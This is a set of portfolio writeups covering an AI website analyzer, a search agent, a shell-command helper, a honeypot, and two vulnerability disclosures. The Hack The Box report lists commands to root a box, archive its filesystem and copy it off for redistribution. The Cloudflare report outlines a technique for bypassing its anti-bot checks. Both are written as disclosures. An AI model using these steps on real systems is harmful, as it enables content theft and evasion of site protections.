1. Disconnect between search rankings and user engagement: A website may rank well in search results but fail to convert visitors due to poor content quality or unclear brand messaging.

2. Lack of brand cohesion: Websites often struggle to maintain a consistent brand voice and message across different pages and sections, leading to a fragmented user experience.

3. Difficulty in content improvement: Website owners may be aware that their content needs enhancement but lack specific, actionable insights on how to improve it.

4. Over-optimization for search engines: In the pursuit of SEO, websites may sacrifice readability and natural language flow, resulting in content that feels artificial or unwelcoming to human readers.

5. Inability to measure content quality objectively: Unlike SEO metrics, which are relatively straightforward to quantify, the quality of website copy and branding has been challenging to measure and improve systematically.

6. Time and resource inefficiency: Manual content audits are time-consuming and often expensive, making it difficult for businesses to allocate resources effectively for website improvements.

7. Lack of tailored recommendations: Generic content improvement advice often falls short of addressing the unique needs and goals of individual websites and their target audiences.

These issues collectively contribute to a significant gap in website optimization strategies, where the focus on search engine algorithms overshadows the equally important need for human-centric, brand-aligned, and emotionally resonant content. This gap not only affects user experience but also impacts key business metrics such as conversion rates, customer loyalty, and overall brand perception.

Addressing these challenges requires a sophisticated approach that goes beyond traditional SEO tools and manual content audits, necessitating an innovative solution that can comprehensively analyze and improve website content from a human-centric perspective.


## Solution

The website analyzer is a sophisticated tool built with a focus on efficiency, accuracy, and user-friendliness. The implementation leverages modern technologies and techniques to deliver a powerful content analysis solution:

Backend Architecture
- Core Language: Python3
- Web Scraping: The tool employs robust web scraping techniques to extract content from target websites efficiently.
- Embedding Model: A local lightweight embedding model is utilized to process and understand the scraped content, enabling nuanced analysis of language and context.
- Inference Engine: GPT-4o-mini is integrated for advanced natural language processing and generation of insights, specifically chosen for its extremely low cost and relatively high benchmark scores.

Analysis Pipeline
- The tool scrapes the content from the provided URL of the target website
- Using regex, it finds all URLs in the page source that are of the same domain of the provided URL, excluding duplicates. It processes this into a list of strings.
- Since there are many URLs that can be considered irrelevant for this type of analysis (e.g. “/terms-and-conditions”, “/warranty”, etc.), The tool makes a query to GPT-4o-mini, asking it to select the ten URLs that are most likely to be helpful for this analysis, and return them in a specific JSON structure.
- Receiving that list of 10 URLs, the tool then scrapes those pages.
- The pages are then heavily processed. The tool removes all CSS styling, JS code, and other code that is not helpful for this use-case.
- The remaining page content then runs through an local, lightweight embedding model, so that the context can be efficiently processed by the inference engine.
- This context is then processed and evaluated through 25 distinct categories, where GPT-4o-mini is specifically prompted to respond in a structured JSON format, in which the categories are organized, along with each of their scores, analyses, and recommendations for improvement.
- GPT-4o-mini is employed to generate detailed analyses, including identifying relevant quotes from the website and crafting tailored improvement recommendations.

Report Generation
- The tool compiles the scores, analyses, and recommendations into a structured HTML report.
- Direct quotes from the website are included to provide context and evidence for the analyses.
- Generated content examples are created to illustrate potential improvements.

Frontend Interface
The user interface is built using TailwindCSS, ensuring a responsive and visually appealing design. The frontend allows users to input website URLs for new report generation, and access a dashboard in which their previously generated reports are organized and viewable.

---

<!-- FILE: tlds.md -->

# TL;DS (Too Lazy; Didn't Search)

## The Information Access Challenge

Traditional search engines present users with a list of links, leaving the task of sifting through multiple sources, synthesizing information, and verifying accuracy entirely to the user. This process, while familiar, is time-consuming and often frustrating. Users must click through multiple results, read lengthy articles, and piece together answers from disparate sources—all while hoping the information is current and reliable.

In 2024, OpenAI announced SearchGPT, a revolutionary approach that combines large language models with real-time web search to provide direct, cited answers instead of just links. The announcement generated significant interest in the AI community, but the product remained in limited testing with no public release timeline. This created an opportunity to explore what such a system might look like and how it could be implemented using available technologies.

## An Early SearchGPT Implementation

TL;DS (Too Lazy; Didn't Search) is a full-stack application that replicates the core functionality of OpenAI's SearchGPT, built before the product became publicly available. The project demonstrates the integration of modern AI frameworks with traditional search APIs to create an intelligent search experience that provides direct answers with verifiable sources.

Rather than simply displaying search results, TL;DS employs an AI agent that actively thinks about user queries, determines what information it needs, performs targeted searches, and synthesizes findings into coherent answers with proper citations. The system operates autonomously, making decisions about when to search, what to search for, and when it has sufficient information to respond.

## Agent-Based Architecture

At the core of TL;DS is a LangChain agent architecture that orchestrates the search and reasoning process. This approach represents a significant departure from simpler AI implementations that merely pass user queries to a language model. Instead, the system uses OpenAI's function calling capabilities to enable the AI to interact with external tools dynamically.

The agent has access to two primary tools: `search_google` for performing web searches via a self-hosted OpenSERP Docker container, and `get_page_text` for extracting and analyzing content from specific URLs. The AI decides when and how to use these tools based on the user's query. For complex questions, it may perform multiple searches, visit different web pages, and synthesize information from various sources before formulating its response.

This architecture allows for genuinely intelligent search behavior. When asked about a topic requiring multiple pieces of information, the agent breaks down the problem, performs targeted searches for each component, and combines the results. The system knows when it needs more information and takes initiative to gather it, mimicking the research process a human might follow.

## Technical Implementation

TL;DS utilizes a carefully selected technology stack that balances modern AI capabilities with practical web development:

**Backend Framework**: Flask provides a lightweight Python web server that handles routing and API endpoints. The simplicity of Flask makes the codebase maintainable while offering sufficient flexibility for the application's needs.

**AI Components**: OpenAI's GPT-4o-mini serves as the reasoning engine, selected for its balance of speed and capability. LangChain orchestrates the agent's decision-making process, managing tool calls and conversation flow through the OpenAIFunctionsAgent pattern.

**Search Infrastructure**: A self-hosted OpenSERP Docker container provides Google search results. The application automatically manages the Docker container lifecycle, starting it when the server launches and cleaning it up on shutdown. This approach eliminates dependency on expensive commercial SERP APIs while maintaining functionality.

**Web Scraping**: BeautifulSoup handles content extraction from web pages, cleaning HTML and formatting text for the AI's consumption. The system limits extracted content to avoid token overflow while preserving enough context for accurate understanding.

**Frontend Design**: Tailwind CSS creates a clean, modern interface that echoes SearchGPT's aesthetic. The UI includes tabbed views for the AI's answer, raw search results, and JSON data, providing transparency into the system's operation.

The favicon caching system deserves particular mention—it extracts and stores site icons to provide visual cues for sources, with a fallback to a default icon when fetching would slow response times. This attention to detail enhances the user experience without sacrificing performance.

## Intelligent Search Flow

When a user submits a query, TL;DS engages in a multi-step process that demonstrates the sophistication of agent-based AI:

1. **Query Analysis**: The AI agent receives the question and evaluates what information it needs to provide a complete answer.

2. **Dynamic Search Strategy**: For straightforward queries, a single search may suffice. For complex, multi-part questions, the agent formulates multiple targeted searches, each designed to gather specific information.

3. **Deep Investigation**: If initial search results don't provide sufficient detail, the agent uses the `get_page_text` tool to extract and analyze content from the most relevant URLs.

4. **Synthesis and Citation**: Once adequate information is gathered, the AI composes a coherent answer and includes hyperlinked citations pointing directly to the sources consulted.

5. **Transparent Results**: Users can switch to the "Google Search" tab to view all sources the AI accessed during its research, or examine the "Raw Data" tab to inspect the JSON response structure.

This workflow occurs automatically, with the agent making all decisions about tool usage. The verbose mode in the backend provides insight into the agent's reasoning process, logging each tool call and decision for developers to observe.

## User Experience Design

The interface balances simplicity with functionality. A clean search box accepts natural language queries without requiring special syntax or formatting. Response time typically ranges around 10 seconds, during which the system indicates it's thinking and working.

The tabbed results view separates concerns effectively. Users primarily see the AI's synthesized answer with inline citations, but those interested in verification can examine the raw search results. This transparency builds trust while maintaining an uncluttered interface for casual users.

Favicon integration provides visual recognition of sources, making it easier to identify familiar and authoritative websites at a glance. The system gracefully handles cases where favicons aren't available, ensuring consistent presentation.

## Performance Considerations

The most significant performance bottleneck is the SERP API response time. The self-hosted OpenSERP container, while cost-effective, introduces latency compared to commercial alternatives. This 10-second response time, though acceptable for a demonstration project, represents the primary area for improvement in a production deployment.

Commercial SERP APIs would likely reduce response times significantly, bringing the experience closer to real-time. However, these services come with substantial costs that make them impractical for personal projects or demonstrations. The choice to use OpenSERP reflects a pragmatic balance between functionality and feasibility.

## Context and Timing

TL;DS was developed as a technical exercise to explore agent-based AI architectures and demonstrate proficiency with modern AI frameworks. Building a SearchGPT replica before the product's public release required synthesizing knowledge from various sources about how such systems might work, including OpenAI's function calling documentation, LangChain's agent patterns, and best practices for AI-powered search.

The project showcases several valuable skills: understanding of AI agent architectures, integration of multiple technologies into a cohesive system, Docker container management, web scraping techniques, API design, and frontend development. These capabilities translate directly to building production AI applications.

## Future Enhancements

Several improvements could enhance TL;DS:

**Performance Optimization**: Migrating to a commercial SERP API would dramatically reduce response times. Alternatively, implementing parallel searches when multiple queries are needed could improve efficiency.

**Caching Layer**: Storing recent search results and AI responses could speed up repeated or similar queries while reducing API costs.

**Advanced Agent Capabilities**: Expanding the tool set to include image search, specific date range searches, or domain-restricted searches would increase the agent's versatility.

**Conversation Memory**: Adding conversation context would enable follow-up questions and multi-turn research sessions.

**Enhanced Citation Format**: Extracting relevant snippets from sources and displaying them alongside citations would provide better context for users.

Despite these potential enhancements, TL;DS successfully demonstrates the core concept: an AI agent that actively researches topics and provides cited, synthesized answers. The implementation proves that powerful search experiences can be built with modern AI frameworks and modest infrastructure.

## Open Source

TL;DS is open source and available on GitHub at [github.com/andrewcampi/TLDS](https://github.com/andrewcampi/TLDS). The project serves as both a functional application and a learning resource for those interested in building agent-based AI systems. The codebase demonstrates practical patterns for orchestrating AI tools, managing external dependencies, and creating user-friendly AI interfaces.

---

<!-- FILE: natural.md -->

# Natural

## The Terminal Command Challenge

For both beginners and experienced users, the Linux terminal can be intimidating. With thousands of commands, countless flags, and complex syntax patterns, even simple tasks often require consulting documentation or searching through man pages. The gap between knowing what you want to accomplish and knowing which command to use creates friction in workflows and can discourage new users from fully embracing the power of command-line tools.

While modern search engines and AI assistants can help translate natural language queries into command suggestions, this typically requires context switching—leaving the terminal, opening a browser, searching for the solution, and then copying it back. This interruption breaks concentration and slows down productivity, especially when you need to execute multiple commands in succession.

## Natural Language to Terminal Commands

Natural is a command-line utility that bridges this gap by converting natural language instructions directly into executable Ubuntu terminal commands. By leveraging [Groq](https://groq.com)'s large language models, Natural eliminates the need for context switching while providing instant access to the full power of the terminal through conversational prompts.

The tool operates entirely within your terminal environment, accepting plain English descriptions of what you want to accomplish and translating them into precise shell commands. Whether you need to manipulate files, manage processes, configure systems, or perform complex operations, Natural interprets your intent and generates the appropriate command syntax.

## Key Features

Natural combines powerful AI capabilities with user-friendly design to create a seamless command-line experience:

**Interactive Safety Mode**: By default, Natural shows you the generated command and asks for confirmation before execution. This transparency ensures you understand what will happen and provides an opportunity to review potentially dangerous operations before they run.

**Automated Execution**: For power users who trust the system and need rapid execution, the `-y` flag enables automatic command execution. The tool prominently warns users about the risks of auto-accepting non-deterministic LLM outputs, as mistakes could lead to data loss or system damage.

**Secure API Key Management**: Natural stores your Groq API key securely in `~/.natural/config.ini`, eliminating the need to repeatedly enter credentials. The tool validates your API key on setup and provides clear feedback if authentication fails.

**Model Selection**: Access to Groq's full range of language models through the `--list-models` and `--model` flags allows you to choose the best model for your needs. The default model is `llama-3.3-70b-versatile`, which provides an excellent balance of speed and accuracy.

**Chain Multiple Operations**: Natural generates one-liner commands that chain multiple operations using `&&` when necessary, enabling complex multi-step workflows to be expressed in a single natural language prompt.

**Diagnostic Tools**: The `--info` flag displays your Natural installation details, including version, API key status, Groq connectivity, and current model selection, making troubleshooting straightforward.

## Installation and Setup

Natural requires Python 3 and a valid Groq API key. Installation is straightforward:

```bash
git clone https://github.com/andrewcampi/natural.git
cd natural
sudo cp natural /usr/local/bin
sudo chmod +x /usr/local/bin/natural
```

Once installed, configure your Groq API key:

```bash
natural --auth YOUR_GROQ_API_KEY
```

Natural will validate your key and confirm successful authentication. Note that Groq has geographic restrictions and may not work in all locations without a VPN.

## Usage Examples

Natural's intuitive syntax makes common tasks simple:

```bash
# Basic file operations
natural copy test.txt to /tmp

# System management
natural show me all running processes using more than 100MB of memory

# Network operations
natural check if port 8080 is open on localhost

# Package management
natural install docker and start the service
```

The interactive mode shows you the generated command before execution:

```bash
$ natural find all PDF files larger than 10MB
Thinking...
The ubuntu terminal command is:
==========
find . -type f -name "*.pdf" -size +10M
=============
Would you like me to execute that? (y/n):
```

For trusted operations, skip confirmation with the `-y` flag:

```bash
natural -y update all system packages
```

## Safety and Limitations

While Natural significantly simplifies terminal usage, it's important to understand its limitations. Large language models can occasionally generate incorrect or unexpected commands, particularly for complex or ambiguous prompts. The interactive mode provides essential oversight, allowing you to catch potential issues before execution.

The `-y` automated mode should be used with extreme caution and only for operations where you fully understand the intended outcome. As Natural prominently warns, auto-accepting non-deterministic LLM outputs can result in commands that accidentally delete data, break system configurations, or cause other catastrophic problems.

Additionally, Natural is designed for Ubuntu terminal commands and may not generate optimal commands for other Unix-like systems or non-standard environments. Always review generated commands for appropriateness in your specific context.

## A Free and Accessible Tool

Natural is completely free to use, requiring only a Groq API key which is also free for personal use. This accessibility makes powerful AI-assisted command-line interaction available to anyone, from students learning Linux to professionals optimizing their workflows.

The tool represents a philosophical approach to AI integration: enhancing human capability without replacing human judgment. By showing you the commands it generates and requiring confirmation by default, Natural acts as a knowledgeable assistant rather than an autonomous agent, helping you learn and accomplish more while maintaining full control over your system.

## Open Source

Natural is open source and available on GitHub at [github.com/andrewcampi/natural](https://github.com/andrewcampi/natural). The project is released under the MIT License, encouraging community contributions and customization for specific use cases.

---

<!-- FILE: octacoy.md -->

# Octacoy


## Writeup

### Traditional Honeypots

Honeypots have long been a part of the cybersecurity toolkit, designed to act as decoy systems that mimic legitimate network resources. These honeypots serve as attractive targets for hackers, luring them away from actual critical systems while simultaneously gathering valuable intelligence on attack patterns and techniques.

The primary purpose of a traditional honeypot is to detect, deflect, or study attempted unauthorized access to information systems. By presenting what appears to be a vulnerable system or network, honeypots can capture detailed information about attacker behavior, tools, and motivations. This data is invaluable for improving overall security posture and developing more effective defensive strategies.

However, traditional honeypots come with significant drawbacks. They are often resource-intensive, requiring dedicated hardware and substantial computing power to convincingly emulate real systems. Setup and maintenance can be complex and time-consuming, demanding specialized knowledge and constant attention to ensure the honeypot remains believable and secure. Perhaps most critically, traditional honeypots typically emulate only a single device on your network, or in some cases, just a single port. This limited scope reduces their effectiveness in today's complex, distributed network environments, where attackers have numerous potential entry points to exploit.


### Lightweight Distributed Honeypots

Lightweight distributed honeypots address the limitations of their traditional counterparts, offering a more flexible and scalable solution for modern network defense. By deploying multiple low-resource decoys across various points in a network, these systems cast a wider net to catch potential threat actors.

The distributed nature of these honeypots significantly increases the chances of detecting and engaging with attackers. Instead of relying on a single point of interest, lightweight honeypots create a network of sensors that can identify malicious activity from multiple angles. This approach is particularly effective in today's complex network environments, where threats can emerge from various vectors.

One of the key advantages of lightweight honeypots is their reduced resource footprint. By utilizing minimal computing resources, these systems can be deployed more extensively without incurring prohibitive costs or straining network infrastructure. This efficiency translates to lower operational expenses and easier scalability, allowing organizations to expand their defensive capabilities as needed.

Moreover, lightweight distributed honeypots often feature simplified setup and maintenance processes. This ease of use makes them accessible to a broader range of organizations, including those without dedicated security teams or extensive cybersecurity expertise. The result is a more accessible approach to network defense, enabling businesses of all sizes to implement advanced threat detection and deception strategies.


### Features of Octacoy

Octacoy represents the cutting edge of lightweight distributed honeypot technology, offering a powerful yet user-friendly solution for enhancing network security. Designed with ease of use in mind, Octacoy requires minimal setup and maintenance, making it accessible to organizations regardless of their cybersecurity expertise.

At the heart of Octacoy's capabilities are its customizable decoys. These fake devices can be tailored to mimic your existing network infrastructure, providing a camouflaged layer of defense that blends seamlessly with legitimate resources. Alternatively, Octacoy can deploy decoys that intentionally appear vulnerable, serving as attractive targets for potential attackers. This flexibility allows organizations to implement sophisticated deception strategies tailored to their specific security needs and threat landscape.

When a threat actor interacts with an Octacoy decoy, the system raises a silent alarm, instantly notifying security teams through its simplistic dashboard. For enhanced responsiveness, Octacoy offers real-time SIEM alert integration, ensuring that critical security information is immediately incorporated into broader threat monitoring and analysis workflows. Additionally, Slack notifications provide instant mobile alerts, enabling rapid response even when security personnel are away from their desks.

Octacoy's containerization with Docker represents a significant advancement in deployment ease and flexibility. This approach allows for quick installation across diverse environments, ensures consistency in operation, and simplifies the update process. The containerized nature of Octacoy also contributes to its lightweight footprint, enabling organizations to deploy dozens of decoys across their network without significant resource overhead.

By combining advanced deception techniques with user-friendly design and efficient resource utilization, Octacoy offers a powerful new tool in the fight against cyber threats. Its ability to cast a wide net across the network, catch sophisticated attackers, and provide immediate, actionable alerts makes it an invaluable addition to any organization's security arsenal.

---

<!-- FILE: vuln-reports.md -->

# Vulnerability Reports


### Cloudflare

[Report Details](https://andrewcampi.com/wiki/cloudflare)
Identified a critical bypass vulnerability in Cloudflare's I'm Under Attack Mode (IUAM) that allows automated tools to bypass security measures, leading to undetected web scraping and automated attacks.


### Hack The Box

[Report Details](https://andrewcampi.com/wiki/hackthebox)

Discovered a critical vulnerability on the Hack The Box platform itself. After sharing this report with them, they stated that they do not plan on addressing it.

---

<!-- FILE: hackthebox.md -->

# Hack The Box - Vulnerability Report

Andrew Campi  
05/20/22

**Notice of Confidentiality:** This document contains a discovered vulnerability that could, if used maliciously, cause harm to the company. The contents of this document are not to be shared or viewed by anyone besides the creator of this document and the intended recipients.  
Table of Contents


## Executive Summary

Hack The Box is a platform in which security enthusiasts can learn hacking tools/methodologies through hands-on practice. The platform has a collection of virtual machines called boxes that have a hidden, intentional vulnerability. Each virtual machine contains a flag that is found in a directory that only a root user can access. Therefore, the user of the platform completes the box when they have root access to the machine. This is inherently very dangerous. Without any security restrictions in place, a user at this level can do anything they desire with the machine.   
To access their full library of boxes, Hack The Box charges a recurring fee. Therefore, Hack The Box’s boxes are valuable, and must remain secure so that they can not be stolen. In Hack The Box’s current state of security, Andrew Campi discovered that a malicious person wanting to steal these boxes has the ability to do so. This vulnerability exists because, once the user of the platform becomes root, they have unrestricted access to the machine.  
Andrew Campi discovered this vulnerability specifically on Linux boxes, which comprise the majority of Hack The Box’s paid-for boxes. Once a malicious person roots a box, they can generate a backup tarball of the essential parts of the file system. After changing the password of the machine, the malicious person can then send themselves the backup via SSH. They can then import the backup as a Docker image, and post it to Docker Hub for all to download and use for free.   
This vulnerability currently affects all Linux based boxes on Hack The Box’s platform, making it a severe vulnerability. With slight modification to the method described in this report, this vulnerability is likely to exist in Windows boxes as well.   
In order to secure their assets, it is recommended that Hack The Box either implements proper restrictions for rooted boxes, or creates an alert system when files are being transferred from the box. 

**Notice of Intent:** Andrew Campi’s only intent is to improve the security posture of Hack The Box. He has absolutely no malicious intent. Andrew will not exploit these vulnerabilities, nor will he publicly expose them. All Hack The Box assets acquired in the included demonstration have been permanently deleted.  
Discovered Vulnerability  
The following vulnerability is specific to Linux boxes. Slight modifications to the following commands are likely to expose the same vulnerability on all Windows boxes. The vulnerability is rated based on the likelihood that it could cause damage when used.

Forbidden Data Extraction  
**Severity:** Critical  
For Linux boxes on the platform, the file system can be extracted. This enables a malicious person to create a Docker image of the box that can be mass distributed for free on Docker Hub.   
The following sections use Lame box as an example. In this example, the target IP address of the box is 10.10.10.3. Exchange this IP addresses to reproduce with the desired Linux box on the Hack The Box platform. 

**Steps to Reproduce:**

1. Connect to Hack The Box’s VPN via OpenVPN.   
2. Turn on the Lame box.   
3. Obtain a root shell on the box. This can be achieved by successful exploitation following an official walkthrough. In this example, the Lame box is rooted using the Metasploit “usermap\_script” module. Take note that the exploited ports are 139 and 445\. Also, take note that the vulnerable service is Samba.  
4. (On the Lame box as root via Metasploit) Change the password to “hackthebox”.

| root@lame:/\# passwd Enter new UNIX password: hackthebox Retype new UNIX password: hackthebox |
| :---- |

5. Exit the metasploit shell.   
6. (On the attack box) Connect via SSH.

| kali@kali $ ssh root@10.10.10.3 |
| :---- |

	If an error occurs stating that “ssh-dss” is required, use the following command.

| kali@kali $ ssh \-oHostKeyAlgorithms=+ssh-dss root@10.10.10.3 |
| :---- |

7. (On the Lame box as root via SSH) Generate the backup tarball with defined exclusions.

| root@lame:\~\# tar \-vcpzf backup.tar.gz \--exclude=/proc \--exclude=/tmp \--exclude=/mnt \--exclude=/dev \--exclude=/sys \--exclude=/media / |
| :---- |

8. Exit SSH.   
9. (On the attack box) Copy the backup tarball off the Lame Box onto the attack box. 

| kali@kali $ scp root@10.10.10.3:/backup.tar.gz /home/kali/Desktop/backups |
| :---- |

10. Change directory to the copied backup tarball (/home/kali/Desktop/backups)  
11. Grant full permissions to the backup tarball.

| kali@kali $ sudo chmod 777 backup.tar.gz |
| :---- |

12. (After installing Docker or confirming that it is installed on the attack box) Create a Docker image from the backup tarball. It will be named “lame” with the tag “latest”. 

| kali@kali $ sudo docker import backup.tar.gz lame:latest |
| :---- |

	This docker image can now be pushed to Docker hub for public download. The   
following steps demonstrate how to use this Docker image. They demonstrate how to exploit it in the same way as the authentic Lame box. 

13. Create a docker container from the image.

| kali@kali $ sudo docker run \-dit \-p 139:139 \-p 445:445 \--name=lame lame bash |
| :---- |

	The docker container has now opened ports 139 and 445 on the attack box.   
However, the vulnerable service is not running yet. A service version scan using   
Nmap on these ports will return “tcpwrapped”. 

14. Generate a root shell on the container.

| kali@kali $ sudo docker exec \-it lame bash |
| :---- |

15. (On the Lame docker container as root) List all services available. Skip this step if the name of the vulnerable service is already known.

| root@c2d777ac091b:/\# ls \-al /etc/init.d/ |
| :---- |

16. (On the Lame docker container as root) Start the Samba service.

| root@c2d777ac091b:/\# service samba start |
| :---- |

17. Exit the Lame Docker container.   
18. (On the attack box) Perform the exact same exploit (metasploit “usermap\_script”), this time setting the RHOST to 127.0.0.1 and the LHOST to eth0.

---

<!-- FILE: cloudflare.md -->

# Cloudflare IUAM: Critical Bypass Vulnerability Report

**Andrew Campi**  
August 23rd, 2024

**Executive Summary**

**Introduction**  
This report details a critical vulnerability discovered in Cloudflare's "I'm Under Attack Mode" (IUAM) protection. My research has uncovered a method that consistently bypasses IUAM, allowing automated access to protected resources as if the IUAM protection was not present.

**Vulnerability Overview**

* **Severity:** Critical  
* **Affected Component:** I'm Under Attack Mode (IUAM)  
* **Success Rate:** Near 100% consistency in bypassing the protection  
* **Potential Impact:** Nullification of IUAM's effectiveness against automated threats

**Key Findings**

* **Complete Protection Bypass:** This method enables automated tools to access IUAM-protected sites without triggering the intended security measures.  
* **High Consistency:** The multi-part bypass technique works reliably, with a success rate near 100%.  
* **Sophisticated Evasion:** The bypass method employs a combination of advanced techniques to circumvent Cloudflare's detection mechanisms:  
  * **Rotating Residential Proxies:**  
    * Utilizes a diverse pool of residential IP addresses to mimic legitimate user traffic.  
    * Constantly rotates proxies to avoid detection and IP-based blocking.  
  * **Browser Emulation via Selenium-Driverless:**  
    * Employs the Selenium-driverless library to control a real Chrome browser instance.  
    * Bypasses common WebDriver detection methods used by anti-bot systems.  
  * **Avoidance of Headless Mode:**  
    * Runs the browser in full GUI mode to present a complete browser environment.  
    * Passes sophisticated checks for screen properties, rendering capabilities, and other browser characteristics.  
  * **Custom Dummy Browser Extensions:**  
    * Generates and implements random browser extensions for each session.  
    * Alters the browser fingerprint to make each automated session appear unique.  
  * **Random URL as Referrer:**  
    * Injects custom JavaScript to set a random referrer URL.  
    * Simulates natural browsing patterns, making automated access appear as legitimate traffic from various sources.  
  * **"Hit It With a Hammer" Challenge Bypass:**  
    * Forcibly removes Cloudflare's challenge elements from the page.  
    * Exploits the challenge refresh mechanism to gain access without solving the challenge.  
* **Minimal Resource Requirements:** The bypass can be executed with relatively modest computing resources, potentially enabling large-scale automated access.

**Immediate Concerns**  
This vulnerability fundamentally undermines the protective capabilities of IUAM, potentially exposing Cloudflare customers to:

* Undetected web scraping activities  
* Automated exploitation of web application vulnerabilities  
* Large-scale credential stuffing or brute force attempts  
* Bypass of rate limiting and anti-DDoS measures

**Cloudflare's Critical Security Features**

Cloudflare has established itself as a leader in web security, with a particular focus on protecting against Distributed Denial of Service (DDoS) attacks and unwanted web scraping. These security features are a primary reason for Cloudflare's widespread adoption among websites of all sizes.

**DDoS Protection**  
Cloudflare's DDoS protection is one of its most critical and widely-used security features:  
**1\. Massive Network Capacity**

* **Global Anycast Network:** Cloudflare's vast network spans over 200 cities, allowing it to absorb and diffuse large-scale DDoS attacks effectively.  
* **Traffic Distribution:** Automatically spreads attack traffic across its global network, preventing any single point of failure.

**2\. Multi-Layer Protection**

* **Layer 3 & 4 Protection:** Mitigates network-layer attacks, including SYN floods, UDP floods, and DNS amplification attacks.  
* **Layer 7 Protection:** Defends against application-layer attacks, such as HTTP floods, slow reads, and other sophisticated request-based attacks.

**3\. Intelligent Threat Detection**

* **Machine Learning Algorithms:** Continuously analyzes traffic patterns to identify and mitigate emerging threats in real-time.  
* **Behavioral Analysis:** Distinguishes between legitimate users and malicious bots based on behavior patterns.

**4\. Unmetered Mitigation**

* **Always-On Protection:** Provides constant protection without charging extra for attack volume or duration.  
* **No Performance Impact:** Maintains website performance even during large-scale attacks.

**Anti-Scraping and Bot Protection**  
Cloudflare offers robust features to prevent unauthorized web scraping and bot activities:  
**1\. Bot Fight Mode**

* **Automated Challenge Generation:** Presents CAPTCHAs or JavaScript challenges to suspected bots.  
* **Progressive Difficulty:** Increases challenge complexity for persistent or sophisticated bots.

**2\. Rate Limiting**

* **Customizable Rules:** Allows setting specific thresholds for request rates from individual IP addresses.  
* **Flexible Response Options:** Offers various actions for rate limit violations, including blocking, CAPTCHAs, or custom error pages.

**3\. User Agent Blocking**

* **Granular Control:** Enables blocking or challenging requests based on specific user agent strings.  
* **Regular Expression Support:** Allows for complex matching patterns to identify and block sophisticated scraping tools.

**4\. IP Reputation Database**

* **Known Threat Intelligence:** Maintains a constantly updated database of IP addresses associated with malicious activities.  
* **Proactive Blocking:** Automatically blocks or challenges requests from IPs with poor reputations.

**5\. JavaScript Detection**

* **Browser Integrity Check:** Verifies if the client can execute JavaScript, a common method to distinguish between real users and basic bots.  
* **Dynamic Challenges:** Generates unique JavaScript challenges to prevent bypass through pre-computed responses.

**6\. "I'm Under Attack" Mode (IUAM)**

* **Challenge Page:** Presents a brief delay and challenge to all visitors when activated.  
* **Effectively Stops Bots:** Highly effective at preventing automated access during periods of suspected attack.

**7\. API Shield**

* **Schema Validation:** Ensures incoming API requests conform to predefined schemas, preventing malformed requests often used in scraping attempts.  
* **Mutual TLS:** Provides an additional layer of authentication for API clients, making unauthorized scraping significantly more difficult.

**The Importance and Usage of Cloudflare's “I'm Under Attack Mode” (IUAM)**

Cloudflare's "I'm Under Attack" Mode (IUAM) is a critical security feature designed to provide an additional layer of protection during intense periods of suspected automated attacks. Its significance in web security cannot be overstated, particularly for sites facing persistent threats from bots, scrapers, and DDoS attacks.

**Core Functionality of IUAM**  
**1\. Challenge Page**

* **Temporary Barrier:** When activated, IUAM presents all visitors with an intermediate page before allowing access to the protected website.  
* **Short Delay:** Implements a brief waiting period (typically 5 seconds) coupled with a JavaScript challenge.  
* **Browser Verification:** Ensures that the client can execute JavaScript and behaves like a genuine web browser.

**2\. Advanced Bot Detection**

* **Behavioral Analysis:** Analyzes visitor behavior patterns to distinguish between human users and automated scripts.  
* **Fingerprinting Techniques:** Utilizes various browser and device characteristics to identify potential threats.  
* **Machine Learning Integration:** Employs AI algorithms to adapt to evolving bot behaviors and attack patterns.

**3\. Adaptive Challenge Difficulty**

* **Progressive Complexity:** Increases the difficulty of challenges for clients exhibiting suspicious behavior.  
* **Dynamic Challenge Generation:** Creates unique challenges for each session to prevent replay attacks.

**Importance in Web Security**  
**1\. Last Line of Defense**

* **Emergency Response:** Acts as a critical measure when standard protections are overwhelmed or bypassed.  
* **Rapid Deployment:** Can be activated instantly, providing immediate protection against sudden surges in malicious traffic.

**2\. Minimal Impact on Legitimate Users**

* **Brief Interruption:** Designed to minimally inconvenience real users while significantly impeding automated threats.  
* **Transparent Protection:** Most legitimate users experience only a short delay, often unaware of the robust security check occurring.

**3\. Effective Against Various Threats**

* **DDoS Mitigation:** Helps absorb and filter out traffic from DDoS attacks by adding an additional verification layer.  
* **Anti-Scraping Measure:** Presents a formidable obstacle to most scraping tools and bots.  
* **Brute Force Prevention:** Effectively slows down automated attempts at credential stuffing or password guessing.

**4\. Protects Origin Servers**

* **Traffic Filtering:** Significantly reduces the volume of malicious requests reaching the origin server.  
* **Resource Conservation:** Helps maintain server performance and availability during attack periods.

**Usage Scenarios**  
**1\. During Active Attacks**

* **DDoS Incidents:** Often activated when a site is experiencing a Distributed Denial of Service attack.  
* **Scraping Campaigns:** Employed when unusual patterns of data harvesting are detected.

**2\. Preventive Measures**

* **High-Risk Periods:** Activated during anticipated times of increased threat, such as major sales events or after public controversies.  
* **Sensitive Content Protection:** Used to safeguard access to particularly valuable or sensitive areas of a website.

**3\. Customized Deployment**

* **Selective Activation:** Can be applied to specific URLs or sections of a website requiring extra protection.  
* **Geolocation-Based:** May be triggered for traffic originating from specific geographic regions associated with higher threat levels.

**Technical Deep Dive and Vulnerability Details**

**Introduction**  
The vulnerability discovered in Cloudflare's "I'm Under Attack" Mode (IUAM) represents a significant breach in what is widely regarded as one of the most robust anti-bot and anti-scraping systems available today. This bypass is not the result of a single flaw or oversight, but rather a sophisticated combination of multiple techniques that, when employed together, create a consistently successful method for circumventing IUAM protections.  
The effectiveness of this bypass method lies in its multifaceted approach, addressing various aspects of IUAM's detection mechanisms simultaneously. By leveraging a synergistic set of techniques, this method exploits gaps in IUAM's defense layers, effectively rendering the protection mechanism ineffective against a well-implemented attack.

Key aspects of this bypass include:

* **Holistic Approach:** Rather than targeting a single vulnerability, this method combines multiple strategies to create a comprehensive bypass solution.  
* **Consistency in Results:** The bypass technique demonstrates a very high success rate, consistently allowing unauthorized automated access to protected resources.  
* **Scalability:** The method can be implemented at scale, potentially allowing for large-scale automated access to IUAM-protected websites.  
* **Adaptability:** The techniques used are flexible enough to potentially adapt to minor changes in IUAM's protection mechanisms, suggesting a robust and resilient bypass method.  
* **Resource Efficiency:** Despite its sophistication, the bypass method is relatively efficient in terms of computational resources required, making it feasible for widespread use.

The implications of this vulnerability are very significant. IUAM is often employed as a last line of defense against determined attackers, particularly during high-stress scenarios such as active DDoS attacks or aggressive scraping attempts. A reliable method to bypass IUAM essentially nullifies this critical layer of protection, potentially exposing Cloudflare's clients to the very threats they rely on IUAM to mitigate.

